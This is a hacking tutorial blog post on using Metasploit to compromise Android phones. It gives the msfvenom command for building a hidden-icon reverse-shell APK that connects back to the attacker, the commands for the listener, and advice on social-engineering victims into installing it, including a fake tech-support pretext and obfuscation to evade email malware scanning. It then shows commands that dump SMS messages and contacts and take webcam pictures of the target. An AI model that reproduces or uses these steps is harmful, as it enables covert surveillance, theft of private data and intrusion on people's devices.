Metasploit Basics, Part 13: Exploiting Android Mobile Devices (Updated)

Hacking Metasploit

Welcome back, my budding hackers!

The growth of the mobile device market has been dramatic over the past 10 years. From its birth in 2007 with the advent of the Apple phone, mobile devices now comprise over 50% of all web traffic in 2020. There are 5B mobile devices on the planet or about one for 3/4 of the world’s population. Of these mobile devices, 75% use the Android operating system. With this market dominance of Android, it is fitting that we focus our mobile hacking upon this dominant operating system.

In this tutorial, we will be using Metasploit to exploit Android devices such as tablets and phones. As you will see, once we have exploited the Android device, we are capable of collecting the target’s text messages, contact list, location and even turn on their webcam!

As of 2020, the malicious app is still the most common method of compromising Android mobile devices with nearly 80% of all attacks a results of these apps. Android users are increasingly finding a need to install 3rd party apps as they want to try different and unique applications not available in the Google Play store.

Android users can enable the download and installation of 3rd party apps by simply following the steps below.

1. Open your Android device Settings.

2. Select Apps and Notifications option

3. Simply enable “Unknown Sources” option

Note: If you won’t find this option under the Apps and Notifications tab. Then try finding it in the device Security Section.

In this tutorial, we will develop our own malicious APK that then must be installed by the user from 3rd party app or physically installed by the attacker.

Step #1: Find Android Exploits

The first step is to search Metasploit for Android exploits.

There are numerous exploits within Metasploit for hacking Android. A quick search reveals the following exploits;

msf > search type:exploit platform:android

As you can see, there are at least 12 exploits for Android operating systems in Metasploit.

Step #2: Find Android Payloads

As you have seen in previous Metasploit Basics tutorials, Metasploit has numerous payloads and those payloads are specific to the operating system and exploit. If we want to exploit an Android system, then we will need an Android payload.

We can find Android specific payloads by searching;

msf > search type:payload platform:android

As you can see, there are numerous Android specific payloads including payload/android/meterpreter/reverse_tcp which we will be using here, but the others can also be used as well.

Step #3: Build an APK file

One of the easiest ways to exploit an Android system is to create an .apk (Android PacKage file) file and have the target install it on their Android phone or tablet. This is usually done through physical access to their phone or through social engineering (“Hello, this tech support. We have detected unusual activity on your phone and need to install a tech support app to monitor this activity…”etc).

As we learned here in Metasploit Basics, Part 9, we can use the msfvenom utility in Metasploit to create custom payloads. In this case, we will convert the payload/android/meterpreter/reverse_tcp into an Android .apk file.

To do so, enter the following command.

msf > msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true AndroidWakeLock=true LHOST=192.168.1.101 LPORT=6996 -f raw -o HackersAriseMalwareApp.apk AndroidMalware.apk

 

Where:

msfvenom the command to create the malicious payload

-p android/meterpreter_reverse_tcp the name of the android payload

AndroidHideAppIcon=true the option hide’s the app’s icon from the user

AndroidWakeLock=true this option keeps the phone from going to “sleep”

LHOST=192.168.1.101 this is the IP address of the attacker (Kali)

LPORT =6996 this is the port to communicate back to the attacker

-f raw this creates the payload in raw format (-f)

-o HackersAriseMalwareApp.apk this is the name of the app to output (-o)

Note that the output complains that “No Platform was Selected” and “No arch selected” but msfvenom is smart enough to know from the payload that you seleted that the platform is Android and the architecture is Dalvik.

For more on how to use msfvenom to create custom payloads, see my tutorial here.

Step #4: Set Up a Multi Handler Listener

Now that we have the .apk built with the Android payload embedded, we need to open a listener on our system to accept the connection from the HackersAriseMalwareApp.apk when it is installed and executed. If you read Metasploit Basics, Part 12, we set up an .rc script to automatically start and open a listener to accept outside connections to our Metasploit. If you did so, you can now start it by entering

msf > resource handler_http.rc

If you don’t have a listener script, you can start a listener by entering the following commands;

msf >use exploit/multi/handler

msf >set PAYLOAD android/meterpreter/reverse_tcp

msf >set LHOST 192.168.1.101

msf > set LPORT 6996

msf > exploit

You must make certain that the PAYLOAD, LPORT and LHOST are the same as you used in creating your .apk file in msfvenom.

Step # 5: Deliver the HackersAriseMalwareApp.apk to the Target

The next step, of course, is to deliver the .apk file to the target’s mobile device. If you have physical access to the device, simply install the HackersAriseMalwareApp.apk. Otherwise, you will need to send it to the target via email or DropBox or other means. It’s important to note that this file will likely be flagged by Gmail and other email services as malware. As a result, consider re-encoding the payload with OWASP-ZSC or other obfuscation software such as shellter or Veil-Evasion.

In addition, you might consider hosting the .apk on your own website and encourage people to download it.

Step #6: Exploiting the Target System

Once the target installs the .apk, we should get a meterpreter prompt like below. We can then enter the command sysinfo to verify we are on the Android device!

meterpreter > sysinfo

We can then enter help to see all the Android meterpreter commands.

meterpreter > help

Note that from the Android meterpreter we have unique options such as;

dump_calllog

dump_contacts

dump_sms

geolocacte

send_sms

These commands give us the power to see just about anything the target is doing on this device as well as finding their location. This meterpreter is also capable of using some of the other standard meterpreter commands such as;

record_mic

webcam_snap

webcam_stream

Step #7: Gathering Data from the Android Device

Let’s start by getting the target’s text messages

meterpreter > dump_sms

Now, let’s get their contacts list.

meterpreter > dump_contacts

Finally, list try listing their web cams so that we can later snap pictures from them.

meterpreter > webcam_list

Now that we have the list of web cams on the device, we can use the meterpreter command webcam_snap followed by the number of the webcam to take pictures of the target from the back camera

meterpreter > webcam_snap 1

Conclusion

The world’s most widely used hacking/pentesting platform, Metasploit has capabilities to exploit just about any system including Android mobile devices. We can create a malicious .apk file and when the target installs the app, we can get almost totally unfettered access to their text messages, contacts and web cams!

Look for my new book, “Metasploit Basics for Hackers” coming out fall 2020!